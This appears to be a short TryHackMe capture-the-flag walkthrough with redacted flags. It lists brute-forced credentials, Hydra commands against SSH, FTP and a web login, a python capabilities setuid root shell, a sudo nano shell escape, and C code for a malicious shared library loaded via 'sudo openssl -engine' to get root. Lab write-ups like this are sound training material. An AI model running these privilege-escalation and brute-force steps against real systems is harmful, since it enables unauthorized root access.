Open Ports
Hidden directories -
/news
/contact
/img
/staff
/backdoor
First flag -
thm{b6.............................}
in the source code of default page on port 80
Second flag -
thm{67.............................}
in the hidden files on anonymous login with ftp ls -la
Credentials -
username: rcampbell
password: cinderella
username: gcrawford
password: evelina
via hydra
Third flag -
thm{12.............................}
in the hidden files in ftp login with rcampbell ls -la
Login via ssh with rcampbell and search for capabilities
getcap -r / 2>/dev/null
python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'
Crack the passphrase for id_rsa of gcrawford
privilege escalation of gcrawford user cuz of sudo ability over nano
We can see nano's GTFOBins
sudo nano
^R^X
reset; sh 1>&0 2>&0
Crack the password for http://10.10.68.205/backdoor
username: plague
password: tonyhawk
hydra -l plague -P /usr/share/wordlists/rockyou.txt 10.10.68.205 http-post-form "/api/login:username=^USER^&password=^PASS^:Incorrect"
You can get a rev shell with user production logged in and can achieve privilage escalation using this c code -
Check out this blog for more on it ld_preload-privesc
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init(){
setgid(0);
setuid(0);
system("/bin/sh");
}
gcc -o shell.so shell.c
sudo openssl req -engine ./shell.so
Fourth flag -
thm{b9.............................}
in the root directory
Fifth flag -
thm{d8.............................}
in the home directory of gcrawford, within business.txt
Sixth flag -
thm{87.............................}
in the home directory of production
Seventh flag -
thm{3c.............................}
in the home directory of tryhackme
Eigth Flag
thm{21.............................}
in /etc/vsftpd.conf
Ninth flag -
thm{06.............................}
in /etc/ssh/sshd_config
